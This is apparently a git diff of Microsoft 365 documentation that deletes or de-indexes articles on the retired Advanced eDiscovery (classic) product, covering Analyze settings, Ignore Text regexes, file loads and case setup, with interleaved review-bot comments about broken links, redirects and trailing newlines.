-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
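Review bot: Unlike most of the sibling articles deleted in this change, the title and H1 here read only "Search and Tagging", with no "(classic)" marker, and the file name `search-and-tagging.md` is equally generic, so links to it from articles that are staying are easy to miss. Please search the remaining docs for references to `search-and-tagging.md` before merging, and check whether the KQL property table (`caselabel`, `fileid`, `relevancescore_[issuenum]`, and the rest) is still needed by anyone running saved queries against a classic case.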
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-analyze-advanced-settings-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-analyze-advanced-settings-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,56 +0,0 @@
-title: "Set Analyze advanced settings in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: a797682f-ad85-4c08-a354-3850ba2237ee
-description: "Learn how to configure advanced settings, including near-duplicates, email threads, and themes, for the Analyze process in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Set Analyze advanced settings in Advanced eDiscovery
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-Advanced eDiscovery provides default advanced parameters for Analyze module settings. The following procedure describes settings that can be specified.
-
-1. In the **Prepare \> Analyze \> Setup** tab, click **Advanced settings** (at the bottom of the page). The following panel is displayed.
-
- ![Set Analyze advanced settings](../media/c9ea3017-e19a-456b-a742-c3d07121a3f6.png)
-
-2. In **Near-duplicates and Email threads parameters**, select values for the following as necessary:
-
- - **Minimum number of words**: Minimum number for words, below which a file is not submitted for Near-duplicate analysis.
-
- - **Maximum number of words**: Maximum number for words, above which a file is not submitted for Near-duplicate analysis.
-
- - **Email similarity**: Minimal level of resemblance for two emails to be considered similar. Value is always equal to, or larger than document similarity. Default is 90%.
-
-3. In **Themes parameters**, select the **Include numbers in theme analysis** check box to include numbers in the processing of Themes during Analyze.
-
-4. Click **Save**.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Viewing Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-analyze-options-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-analyze-options-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,86 +0,0 @@
-title: "Set Analyze options in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: f6cd6588-f6b6-424a-a9ab-3782b842faee
-description: "Review the steps to set up options for the Analyze process in Advanced eDiscovery, including near-duplicates, email threads, and themes."
-ms.custom: seo-marvel-apr2020
-
-# Set Analyze options in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, set the Analyze options prior to running Analyze.
-
-## Set Analyze options
-
-Open **Prepare \> Analyze** \> **Setup**. The following window is displayed.
-
-![Set Analyze Options](../media/c3ec7a92-8484-4812-b98c-aa3eb740e5b7.png)
-
- **Near-duplicates and email threads** Check this box if you want to run the analysis. It is selected by default.
-
- **Document similarity** Enter the Near-duplicates threshold value or accept the default of 65%.
-
- **Themes**Check this box to process all files and assign themes to them. By default, this check box is not selected. Enter the following options if you want to perform Themes processing.
-
-- **Max number of themes**Enter or select a value for the number of themes to create. The default is 200.
-
- > [!NOTE]
- > Increasing the number of themes affects performance, as well as the ability of a theme to generalize. The higher the number of themes, the more granular they are. For example, if a set of 50 themes include a theme such as "Basketball, Spurs, Clippers, Lakers"; 300 themes may include separate themes: "Spurs", "Clippers", "Lakers". If you had no awareness of the theme "Basketball" and use this feature for ECA, seeing the theme "Basketball" could be useful. But, if the processing had too many themes, you may never see the word "Basketball" and may not know that Spurs and Clippers are good Basketball themes to review, rather than items that go on boots and used for hair.
-
-- **Suggested themes** You can suggest theme words to control Themes processing. Advanced eDiscovery will focus on these suggested words and try to create one or more relevant themes, based on the "Max number of themes" settings.
-
- For example, if the suggested word is "computer", and you specified "2" as the "Max number of Themes", Advanced eDiscovery will try to generate two themes that relate to the word "computer". The two themes might be "computer software" and "computer hardware", for example.
-
- ![Add suggested theme](../media/06e9ffd3-a76c-423b-b450-9e465eb9a02f.png)
-
-1. To view, add, or edit suggested themes, click **Modify**.
-
-2. In the **Suggested themes** panel, click the **Add** ![add icon](../media/c2dd8b3a-5a22-412c-a7fa-143f5b2b5612.png) icon to add a theme. In the **Add suggested theme** panel, add the words, separated by commas.
-
-3. In **Number of themes**, select a value to determine the number of themes Advanced eDiscovery will try to generate for these words (default is 1 theme).
-
-4. Click **Save** and then close the dialogue.
-
- > [!NOTE]
- > The total number of themes includes Suggested Themes. The total Suggested Themes cannot exceed the total themes. If there are many Suggested Themes relative to the total themes, only a few "novel" themes will be detected by the system because most of the themes will be dedicated to Suggested Themes.
-
-- **Mode** From the drop-down list, select a **Themes** option:
-
- - **Create and apply model**: Calculates themes by models from a segment of the files and then distributes files among them.
-
- - **Create model**: Calculates a themes model from a segment of the files. The Apply process of dividing files is done separately at another time.
-
- - **Apply model**: This option is only shown if a model was created previously and not yet applied. This will divide the files based on the themes.
-
-You can also [set ignore text](set-ignore-text-in-advanced-ediscovery.md) and [set Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md) for Analyze.
-
-After you've set these options, click **Analyze** to run. [View Analyze results](view-analyze-results-in-advanced-ediscovery.md) are displayed.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Set Ignore text ](set-ignore-text-in-advanced-ediscovery.md)
-
-[Set Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[View Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-ignore-text-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-ignore-text-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,132 +0,0 @@
-title: "Set Ignore Text option for Analyze in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: conceptual
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 44055727-56e8-42d7-9dc3-fb942f3901cc
-description: "Learn how to define the rule to ignore specific text when using the Analyze and Process modules in Advanced eDiscovery."
-
-# Set Ignore Text option for Analyze in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The Ignore Text feature can be applied to all or any of the following Advanced eDiscovery modules: Analyze (Near-duplicates, Email Threads, Themes) and Relevance. Ignored text will not appear in files displayed in Relevance, and the analysis/calculations will discard the ignored text.
-
-If the Ignore Text feature was previously defined for modules that have already run, the Ignore Text setting will now be protected from being modified. However, the Ignore Text feature for the Relevance module can still be changed at any time.
-
-## How Ignore Text filters are applied
-
-Multiple Ignore Text filters are applied in the order that they were entered. To change the order in which they are applied, they must be deleted and re-entered in the desired order.
-
-For example, if the text content is: "DAVE BOB ALICE CAROL EVE", the following are samples of Ignore Text entries and the results these entries produce:
-
-|**Ignore Text entries** <br/> |**Results** <br/> |
-|:-----|:-----|
-|"ALICE", "BOB CAROL" <br/> |"DAVE EVE" <br/> |
-|"ALICE", "BOB ALICE CAROL" <br/> |"DAVE BOB CAROL EVE" <br/> |
-
-The second Ignore Text entry is not implemented because the string is not found as such AFTER the first Ignore Text has been applied.
-
-## Use regular expressions when defining Ignore Text
-
-Regular expressions are supported for use when defining Ignore Text. The following are examples of regular expression syntax and usage:
-
-- To remove (ignore) text from Begin until the end of a line:
-
- `Begin(.*)$`
-
- where "Begin" is the initial occurrence of this string in the line.
-
- For example, for the following text:
-
- **"This is first sentence and first line**
-
- **This is second sentence and second line"**
-
- the Regular Expression first(.\*)$ will result in:
-
- **"This is**
-
- **This is second sentence and second line"**
-
-- To remove disclaimers and legal statements automatically inserted at the end of email threads:
-
- `Begin(.|\s)*End`
-
- where "Begin" and "End" are unique strings at the beginning and end of a wrapped text paragraph.
-
- For example, the following regular expression will remove disclaimers and legal statements that were in the email thread between the Begin and End strings:
-
- **This message contains confidential information (.|\s)\*If verification is required please request a hard-copy version**
-
-- To remove a disclaimer (including special characters):
-
- For example, for the following text (with the disclaimer represented here by x's):
-
- **/\*\ This message contains confidential information. xxxx xxxx**
-
- **xxxx xxxx xxxx xxxx xxxx xxxx xxxx**
-
- **xxxx xxxx If verification is required, please request a hard-copy version. /\*\**
-
- the regular expression to remove the above disclaimer should be:
-
- **\/\\*\\ This message contains confidential information\.(.|\s)\* If verification is required please request a hard-copy version\. \/\\*\\**
-
-- Regular expression rules:
-
- - Any characters that are not part of the alphabet except for space(s), "_" and "-" must be preceded by "\".
-
- - The regular eExpression field can be unlimited length.
-
-> [!TIP]
-> For an explanation and detailed syntax of regular expressions, see: [Regular Expression Language - Quick Reference](https://msdn.microsoft.com/library/az24scfc%28v=vs.110%29.aspx).
-
-## Define Ignore Text rule
-
-1. In the **Manage \> Analyze \> Analyze options** tab, in the **Ignore Text** section, click the **+** icon to add a rule.
-
-2. In the **Add Ignore Text** dialog, in the **Name** field, type a name for the Ignore Text rule.
-
- ![Add ignored text](../media/98e5129b-2667-4692-86fa-2d0117187a7f.png)
-
-3. In the **Text** box, type the text to be ignored. The text field allows an unlimited number of characters.
-
- > [!TIP]
- > As shown in the window above, click **light bulb** to see common syntax guidelines for the Ignore Text rule.
-
-4. Select the **Case sensitive** check box, if desired.
-
-5. In the **Apply to** list, select the Advanced eDiscovery modules in which to apply the definition.
-
-6. If you want a test run on sample text, type sample text in the **Input** text box and click **Test**. The results are displayed in the **Output** text box.
-
-7. Click **OK** to save the Ignore Text rule. The defined Ignore Text rule is displayed.
-
- ![Set ignored text name](../media/3a788ac3-4a1c-46c9-89bd-7ff32d68ce23.png)
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](set-analyze-advanced-settings-in-advanced-ediscovery.md)
-
-[Viewing Analyze results](view-analyze-results-in-advanced-ediscovery.md)
-
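Review bot: this hunk removes the Ignore Text article through its closing "See also" section, so inbound links need checking before merge. The one link to it visible in this batch, `[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)` in understand-document-similarity-in-advanced-ediscovery.md, is deleted in the same change, but please confirm that no retained article still points at this file.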
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-up-loads-to-add-imported-files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-up-loads-to-add-imported-files.md deleted file mode 100644
@@ -1,141 +0,0 @@
-title: "Set up loads to add imported files in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 0e0a9d04-294f-4f54-8bf1-b32d81345126
-description: "Review the steps to add imported files to the last defined load, or batch, of files before performing Relevance training in Advanced eDiscovery."
-
-# Set up loads to add imported files in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, a load is a new batch of files added to a case. By default, one load is defined and all imported files are added to it. Before performing Relevance training, imported files must be added to the load.
-
-Consider the following scenarios:
-
-- New files are known to be similar to the previous files loaded to the case database, or the previous load of files was a random set from the file collection. In this instance, add the imported files to the current file load.
-
-- New files are different from previous ones (for example, from a different source), or you have no prior knowledge that they're similar or different to the previous loads. In this scenario, add the imported files to a new file load. Advanced eDiscovery recognizes this as a Rolling loads scenario, invokes a Catch-up process, locks Relevance training and Batch calculations until Catch-up is completed, and the new load is integrated and trained.
-
-## Adding imported files to the current load
-
-All imported files must be added to a load to be processed in Advanced eDiscovery. Imported files are added to the last defined load. If you import additional files later, they also must be added to the load.
-
-1. In the **Relevance \> Relevance setup** tab, select **Loads**.
-
- ![Relevance Setup Loads tab](../media/278aac7f-655f-462f-852a-6baa5d818768.png)
-
-2. **Include files**: Select an option for files to include. By default, adding files to the current load is based on the "All files" population.
-
- > [!TIP]
- > Load all available culled files into Relevance. If you plan to load only a subset of the available files, please first consult with Support, as loading subsets can adversely affect Relevance training.
-
-3. In **Loads management**, select a load.
-
-4. Click **Add files**. The files are added to the load and a confirmation message is displayed.
-
-5. Click **OK**.
-
-The files can now be processed in Advanced eDiscovery Relevance for training the files.
-
-## Editing a load name within a case
-
-If changing the load name, it is recommended to use a name that is significant to the case.
-
-1. In the **Relevance \> Relevance setup** tab, select **Loads**.
-
-2. From the **Loads management** list, select a load and click the **Edit** icon. The Edit load window is displayed.
-
-3. Enter the changes, and then click **OK**.
-
-## Adding imported files to a new load
-
-After starting Relevance training or performing Batch calculation, you may want to import and process an additional set of files.
-
-During Catch-up, you can create, tag, and analyze the Catch-up set. Advanced eDiscovery compares its assessment of Relevant and Non-Relevant files in the new load to those in previous loads. Based on the results, you are prompted to make Catch-up decisions, if necessary, and Advanced eDiscovery provides recommendations based on the accrued Relevance information.
-
-Rolling Loads and Catch-up functionality varies as follows:
-
-- When you import a new file load after Batch calculation, Advanced eDiscovery determines to what extent the files fall into one of the following categories:
-
- - Similar (homogeneous): A new, custom round of Relevance training is not required and the knowledge accrued from the previous load can be applied "as is" to the new load.
-
- - Distinct (heterogeneous): A new, custom round of Relevance training is required, and the knowledge accrued from the previous load cannot be applied.
-
- These terms refer to the level of similarity of files between loads and not within the loads.
-
-- When importing a new file load during Relevance training (before Batch calculation), Catch-up enables you to continue Relevance training on the united file set. Advanced eDiscovery does not estimate whether the new load is similar to or distinct from the previous load. It simply collects information about the new load and enables Relevance training to continue on the new and previous sets of files.
-
-- When there are multiple issues in Relevance training as well as issues after Batch calculation, the Catch-up process is performed once for all issues, and the results are calculated and displayed for each issue.
-
-> [!NOTE]
-> The size of the Catch-up sample may vary. It depends on the size of the new load relative to the previous loads, and on the number of samples completed before adding the new load. The Catch-up sample is typically a set of 200 to 2,000 files from the new load.
-
-> [!TIP]
-> Catch-up stops any other tasks and requires individual file tagging and review. Therefore, you can reduce overhead when you add new files in large batches.
-
-## Adding a new file load using Catch-up and Rolling loads
-
-1. In the **Relevance \> Relevance setup** tab, select **Loads**.
-
-2. Under **Loads management**, click the **+** icon to add a load. A confirmation message is displayed.
-
-3. Click **Yes** to continue. The **Add new load** dialog is displayed.
-
- > [!NOTE]
- > You can only add a new load if actions were performed to the previous load.
-
-4. In the **Add new load** dialog, type information in **Load name** and **Description** and then click **OK**. Advanced eDiscovery adds a new load.
-
-5. To import the new load file, click **Add files**. All new files are added to this load. After Advanced eDiscovery imports the files, it recognizes the Rolling loads scenario and indicates Catch-up as the next step.
-
-6. Click **Catch-up** at the bottom of the dialog to run the scenario.
-
- A single Catch-up set, typically containing 200 to 2,000 files from the new load, is created for all issues to allow concurrent file tagging.
-
- Details are provided about whether loads are similar or distinct, whether Advanced eDiscovery merged or split the loads automatically, and information regarding processing in the next step.
-
- You can then tag files and run a calculate operation. The tagging enables Relevance to determine if loads are similar or distinct and enables you to continue working on the new set of files.
-
-7. After the Catch-up set is reviewed, view **Relevance \> Track** for the Catch-up results.
-
-1. If the new file load was added during Relevance training (meaning, the issue has not yet gone through Batch calculation), **Continue training** is the next step, regardless of the Catch-up results.
-
- The new and previous loads are processed as one load and Relevance training continues on the united set. You are now finished with this procedure and can continue Relevance training.
-
-2. If the new load was added after Batch calculation, proceed to the following steps.
-
-8. For new loads added after Batch calculation, Advanced eDiscovery determines if the new load is similar to or distinct from previous loads, as follows:
-
-1. If loads were found to be similar: No additional Relevance training is necessary. The dashboard shows the recommended next step is to run ** Batch calculation ** again to calculate Relevance scores for the new load. Loads were found to be similar, so the previous classifier analysis can be run on the new files.
-
-2. If loads were found to be distinct: More Relevance training is necessary and the next step is Catch-up decision. Select a Catch-up decision as follows:
-
- If you select **Merge loads**, Advanced eDiscovery merges previous and new loads for the training set. Although the first load went through Batch calculation, more training is needed. Continue training new and previous loads together. Batch calculation will then run again and the previous Batch calculation scores should be ignored. Choose this selection when Relevance scores for existing loads can be recalculated, for example, when review of existing file loads has not started.
-
- If you select **Split loads**, continue Relevance training only on the new load. In this instance, previous Batch calculation scores will remain as is. Choose this option when existing Relevance scores for existing loads cannot be recalculated, for example, if review of existing loads has already started. Relevance scores are managed separately from this point onward and cannot be merged.
-
-3. Click **Continue training**.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Defining issues and assigning users](define-issues-and-assign-users.md)
-
-[Defining highlighted keywords and advanced options](define-highlighted-keywords-and-advanced-options.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/set-up-users-and-cases-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/set-up-users-and-cases-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,63 +0,0 @@
-title: Set up users and cases in Advanced eDiscovery
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-ms.date:
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 60ffd80b-4376-419d-b6e4-a72029b9907c
-description: "Learn how to configure user roles, create cases, and assign users to cases in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Set up users and cases in Advanced eDiscovery (classic)
-
-This topic describes how to set up users and cases for Advanced eDiscovery (classic).
-
-> [!IMPORTANT]
-> As we continue to invest in newer versions of Advanced eDiscovery, we are announcing the retirement of Advanced eDiscovery, also known as *Advanced eDiscovery (classic)* or *Advanced eDiscovery v1.0*. If you're still using Advanced eDiscovery v1.0, please transition to [Advanced eDiscovery v2.0](overview-ediscovery-20.md) (also known as the *Advanced eDiscovery solution in Microsoft 365*) as soon as possible. Advanced eDiscovery 2.0 contains similar functionality found in Advanced eDiscovery v1.0, but also offers many new features such as custodian management, communications management, and review sets. To learn more about the retirement of Advanced eDiscovery v1.0, see [Retirement of legacy eDiscovery tools](legacy-ediscovery-retirement.md#advanced-ediscovery-v10).
-
-## Requirements to set up users and cases
-
-Before setting up cases and users in Advanced eDiscovery, the following is required:
-
-- To analyze a user's data using Advanced eDiscovery, the user (the custodian of the data) must be assigned an Office 365 E5 license. Alternatively, users with an Office 365 E1 or E3 license can be assigned an Advanced eDiscovery standalone license. Administrators and compliance officers who are assigned to cases and use Advanced eDiscovery to analyze data don't need an E5 license.
-
-- You have to be a member of the eDiscovery Manager role group in the Security &amp; Compliance Center to create an eDiscovery case and add members to it. To add yourself to the eDiscovery Manager role group in Security &amp; Compliance Center, you have to be a global administrator in your organization. If you're not a global administrator, you 'll have to ask a global administrator to add you to the eDiscovery Manager role group. For more information, see:
-
- - [Permissions in the Microsoft 365 Security &amp; Compliance Center](~/security/office-365-security/protect-against-threats.md)
-
- - [Assign eDiscovery permissions in the MicrosoftΓÇì 365 Security &amp; Compliance Center](assign-ediscovery-permissions.md)
-
-## Step 1: Assign users eDiscovery permissions
-
-The first step is to assign users the requirement permissions in the Security &amp; Compliance Center so that they can me added as a member of an eDiscovery case. After a user is added as a member of a case in the Security &amp; Compliance Center, they'll be able to access the case in Advanced eDiscovery.
-
-To assign a user the necessary permissions so they can be added as a member of an eDiscovery case, see Step 1 in [eDiscovery cases in the Microsoft 365 Security &amp; Compliance Center](ediscovery-cases.md#step-1-assign-ediscovery-permissions-to-potential-case-members).
-
-## Step 2: Create an eDiscovery case and add members
-
-The next step is to create a new eDiscovery case in the Security & Compliance Center and add members. Members of the case will then be able to access the case in Advanced eDiscovery.
-
-1. To create a new eDiscovery case, see Step 3 in [Get started with Core eDiscovery](get-started-core-ediscovery.md#step-3-create-a-core-ediscovery-case).
-
-2. To add members to an eDiscovery case, see Step 4 in [Get started with Core eDiscovery](get-started-core-ediscovery.md#step-4-optional-add-members-to-a-core-ediscovery-case)
-
-## Step 3: Go a case in Advanced eDiscovery
-
-After you create an eDiscovery case and add members, you (or any member of the case) can access the corresponding case in Advanced eDiscovery. To access a case in Advanced eDiscovery, see [Accessing a case in Advanced eDiscovery](quick-setup-for-advanced-ediscovery.md#accessing-a-case-in-advanced-ediscovery).
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Preparing data for Advanced eDiscovery (classic)](prepare-data-for-advanced-ediscovery.md)
-
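Review bot: this deletion needs a redirect for the published URL, because the `[!IMPORTANT]` note removed near the top of the file is the only retirement notice visible in this batch. It names overview-ediscovery-20.md as the replacement and legacy-ediscovery-retirement.md#advanced-ediscovery-v10 for the details; redirecting to one of those two keeps that guidance available to anyone following an existing link to the role-group and case setup steps.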
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/tagging-and-assessment-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/tagging-and-assessment-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: b5c82de7-ed2f-4cc6-becd-db403faf4d18
+ROBOTS: NOINDEX, NOFOLLOW
description: "Review the steps to perform Assessment training, including tagging files, and reviewing assessment results in Advanced eDiscovery." ---
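Review bot: the added `ROBOTS: NOINDEX, NOFOLLOW` line only keeps this page out of search results; the page stays published and reachable by direct link, and nothing in the hunk tells a reader who arrives that way that the classic product is being retired. Please confirm the body already carries the retirement `[!IMPORTANT]` note that set-up-users-and-cases-in-advanced-ediscovery.md had, or add it in the same change as this metadata line.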
@@ -117,18 +118,4 @@ In the absence of statistically based stabilization, there will be results with
> [!TIP] > In the **Relevance \> Track** tab, expanded issue display, the following viewing options are available: > The recommended next step, such as **Next step: Tagging** can be bypassed (per issue) by clicking the **Modify** button to its right, and then selecting an different step in the **Next step**. When the assessment progress indicator has not completed, assessment will be the next recommended option, to tag more assessment files and increase statistics accuracy. > You can change the error margin and assess its impact, by clicking **Modify**, and in the **Assessment level dialog**, changing the **Target error margin for recall estimates**, and clicking **Update values**. Also, in this dialog, you can view advanced options, by clicking **Advanced**. > You can view additional assessment level statistics and their impact by clicking **View**. In the displayed Detail results dialog, statistics are available per issue, when there are at least 500 tagged assessment files and at least 18 files are tagged as Relevant for the issue.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
+
\ No newline at end of file
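Review bot: the single added line at the end of this hunk is an empty `+` line followed by `\ No newline at end of file`, so the article now ends in a stray blank line with no terminating newline. Drop the added line and end the file with one newline after the TIP block; the tagging-and-relevance-training hunk that follows ends the same way.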
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/tagging-and-relevance-training-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/tagging-and-relevance-training-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: 8576cc86-d51b-4285-b54b-67184714cc62
+ROBOTS: NOINDEX, NOFOLLOW
description: "Learn the steps to tag and then work with a training sample of 40 files during the Relevance training stage of Advanced eDiscovery." ---
@@ -92,18 +93,4 @@ The sample files list allows you to view a list of the files in a training sampl
To navigate to the next file in the sample: Shift + \> To navigate to the last file in the sample: Shift + Ctrl + \>
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
+
\ No newline at end of file
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/test-relevance-analysis-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/test-relevance-analysis-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: 1b092f7c-ea55-44f5-b419-63f3458fd7e0
+ROBOTS: NOINDEX, NOFOLLOW
description: "Learn how to use the Test tab after Batch calculation in Advanced eDiscovery to test, compare, and validate the overall quality of processing." ---
@@ -104,18 +105,3 @@ The "Test the Slice" test performs testing similar to the "Test the Rest" test,
10. Review and tag each of the files in the **Relevance \> Tag** tab and when done, click **Calculate**. 11. In the Test tab, you can click **View results** to see the test results.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/track-relevance-analysis-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/track-relevance-analysis-in-advanced-ediscovery.md
@@ -15,6 +15,7 @@ search.appverid:
- MOE150 - MET150 ms.assetid: 3ab1e2c3-28cf-4bf5-b0a8-c0222f32bdf5
+ROBOTS: NOINDEX, NOFOLLOW
description: "Learn how to view and interpret the Relevance training status and results for case issues in Advanced eDiscovery." ---
@@ -164,18 +165,3 @@ This view shows the following:
- **Recall**: Percentage of Relevant files in the review set. - **Distribution by relevance score**: Files in the dark gray display to the left are below the cutoff score. A tool-tip displays the Relevance score and the related percentage of files in the review file set in relation to the total files.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Performing and reviewing Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Performing Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Making decisions based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/understand-document-similarity-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/understand-document-similarity-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,65 +0,0 @@
-title: "Understand document similarity in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 09/14/2017
-audience: Admin
-ms.topic: conceptual
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 4d4cb381-4c9a-4165-a455-609d525c7a88
-description: "Review how document Similarity value, the minimal level of resemblance for two files to be considered near-duplicates, works in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# Understand document similarity in Advanced eDiscovery (classic)
-
-> [!NOTE]
